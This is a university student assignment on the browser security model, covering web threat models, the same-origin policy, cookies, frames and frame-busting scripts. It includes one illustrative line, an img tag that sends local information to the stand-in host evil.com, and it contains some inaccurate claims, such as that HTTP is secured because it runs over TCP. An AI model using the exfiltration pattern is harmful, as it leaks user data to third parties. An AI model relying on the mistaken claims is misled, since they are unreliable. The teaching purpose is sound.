Browser Security Model

Page 1

THE UNIVERSITY OF DODOMA

College Of Informatics and Virtual Education PROGRAM: B Sc. Computer and Information Security ASSIGNMENT NO.1

COURSE NAME: Network Security COURSE CODE: CS 222 COUSE INSTRUCTOR: Khamis Fereji Topic: Browser security model Participants: S/n 1 2 4 5

Name MAKAME, MAKAME H TWALIB,MOHAMED A MBEYELA, JOAN MWOMBEKI,JUDITH

Registration No. T/UDOM/2010/00410 T/UDOM/2010/00441 T/UDOM/2010/00415 T/UDOM/2010/00428

Introduction Browser security model is a category of Web security. Whereby web security includes the policies, services and mechanisms of preventing, detecting and recovering from Web attacks. Goals of web security  

For browsing the Web safely. User should be able to visit variety of websites without being harmed. Secure Web applications. Applications delivered in Web should have the same secure state as stand-alone applications. A diagram on Browser Communication on a network.

Website

Browser

Network

Web Threats Model There are three types of web threat models. Web attacker Controls malicious website i.e. attacker .com, he can obtain SSL/TLS certificate freely for his site. A victim is lured into the website when he visits it for different purposes such as enticing contents, search results or placed by an ad network. In this there is no control of network. Network Attacker It is divided into two types of attacks; 

Passive attacks. They are in nature of eavesdropping on, or monitoring of transmissions. The goal of an attacker is to obtain information that is being transmitted. Attacker does not affect the system resources but attempts only to learn or make use of information. Example, wireless eavesdropper.



Active attacks. This type involves modification of data stream or creation of false stream. It attempts to alter system resources or affect the operations. Example, Evil router and DNS poisoning.

Malware attacker An attacker control users machine, Exploit application bugs such as buffer overflow because browsers enable remote code execution, and convince a user to install malicious contents such as viruses by playing masquerade (Attacker may pretend to be an anti-virus).

The Browser as an OS and Execution Platform Hypertext Transfer Protocol Is an application layer protocol under TCP hence it is secured. It has two basic types of messages, http request and http response. As operating systems having a disk for storage http makes use of cookies. Http is stateless, cookies give it state.

HTTP REQUEST Method

File

Http Version

GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)

Host: www.example.com Referer: http://www.google.com?q=dingbats For Methods GET - No side effect. POST - Possible side effect.

Headers

Rendering Content Each browser window or frame  Loads content  Renders Processes HTML and scripts to display page. May involve images, sub frames,  Responds to events Events can be o User actions: On Click. o Rendering: OnLoad. o Timing: setTimeout().

Same-Origin Policy The most important security concept within modern browsers is the idea of the same-origin policy. The principal intent for this mechanism is to make it possible for largely unrestrained scripting and other interactions between pages served as a part of the same site (understood as having a particular DNS host name, or part thereof), while almost completely preventing any interference between unrelated sites. Same-Origin policy for Document Object Model (DOM) access Object-oriented interface used to read and write documents. With no additional qualifiers, the term "same-origin policy" most commonly refers to a mechanism that governs the ability for JavaScript and other scripting languages to access DOM properties and methods across domains In essence, the model goes down to this three-step decision process: 

If protocol, host name, and - for browsers other than Microsoft Internet Explorer - port number for two interacting pages match, access is granted with no further checks.

Any page may set document.domain parameter to a right-hand, fully-qualified fragment of its current host name (e.g., do.car.sec.com may set it to sec.com, but not ec.com). If two pages explicitly and mutually set their respective document.domain parameters to the same value, and the remaining same-origin checks are satisfied, access is granted.

If neither of the above conditions is satisfied, access is denied.

HTML image Tags Security issues on Image tags as a content. 

Communicate with other sites <img src=“http://evil.com/pass-localinformation.jpg?extra_information”>

Spoof other site by adding logos that fool a user. Note: A web page can send information to any site. JavaScript on Error

Basic function Triggered when error occurs loading a document or an image. Example: <img src="image.gif" onerror "alert ('The image cant not be loaded ')“>

Runs on Error handler if image does not exist and cannot load.

Remote Scripting Goal Exchange data between a client-side apps running in a browser and Server’s-side app, without reloading page.  Methods  Java Applet/ActiveX control/Flash Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)  XML-RPC Open, standards-based technology that requires XML-RPC libraries on server and on client-side code.  Simple HTTP via a hidden IFRAME IFRAME with a script on a web server (or database of static HTML files) is by far the easiest of the three remote scripting options. Note: A web maintains bi-directional communication with browser (until user closes/quits) Isolation In isolation the user’s machine applications should be well isolated from the unknown interactions with untrustworthy web/ browser applications. The mechanisms used are explained as follows.

Running of a remote code is not encouraged. An attacker can compromise user’s integrity or confidentiality by doing the following .Compromise your machine, Install malware rootkit, Transact on your accounts, Read your information, Steal passwords and Read your email.

Frame and iFrame Window may contain frames from different sources  

Frame: rigid division as part of frameset iFrame: floating inline frame

Why use frames?  Delegate screen area to content from another source.  Browser provides isolation based on frames.  Parent .may work even if frame is broken.

Frame Communication PostMessage. Is the new API for inter-frame communication. It is supported in latest browsers such as Mozilla Firefox, Opera, Microsoft internet explorer etc. it has a secured fragment identifier messaging. It is not a secure channel because it offers integrity and authentication but not confidentiality. Frame Navigation Permissive Policy: A frame can navigate any frame. Therefore there is nothing determining a frame contents. This has resulted to a Guninski attack. Window policy: A frame can navigate frames in its own window. This has led to Gadget hijacking. Parent Policy: A frame can navigate its children. Ancestor Policy: A frame can navigate its descendants. Table 1 Analogy of OS with Browser

Operating system

Web browser

Primitives System calls, Processes, Disk Document object model, Frame, Cookies/local Storage

Principals: Users Discretionary access control

Vulnerabilities Buffer overflow Root exploit

Mandatory access control

Cross-site scripting Cross-site request forgery Cache history attacks

Basic HTTP Cookies A cookie is used for an origin website to send state information to a user's browser and for the browser to return the state information to the origin site. Cookies security polices Uses   

User authentication Personalization User tracking: e.g. Doubleclick (3rd party cookies)

Browser will store at most 20 cookies/site, 3 KB / cookie. Origin is the tuple <domain, path> 

Can set cookies valid across a domain suffix

Secure cookies   

Provides confidentiality against network attacker Browser will only send cookie back over HTTPS Problems no integrity o network attacker can rewrite secure cookies over HTTP o can log user into attacker’s account

Httponly cookie Cookie sent over HTTP(s), but not accessible to scripts   

Cannot be read via document.cookie Also blocks access from XMLHttpRequest headers Helps prevent cookie theft via XSS

Browser UI and security indicators Frame A frame is a subdivision of a Web browser window and can act like a smaller window. 

Embed HTML documents in other documents <iframe name=“myframe” src=“http://www.google.com/”> This text is ignored by most browsers. </iframe>

Frame Busting Preventing a Web page from being displayed within a frame using JavaScript code  

example: opening login page in a frame will display correct passmark image The typical source code for a frame busting script is:

<script type="text/javascript"> if(top != self) top.location.replace(location); </script> Better Frame busting  

Problem: Javascript OnUnload event <body onUnload="javascript: cause_an_abort ;)"> Solution if (top != self) top.location.href = location.href else { … code of page here …}

Conclusion Browser security is among the most challenging security fields, as threats and vulnerabilities are always increasing.

References  

John Mitchell, Browser Security Model, spring 2010. http://www.wekipedia.com

Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.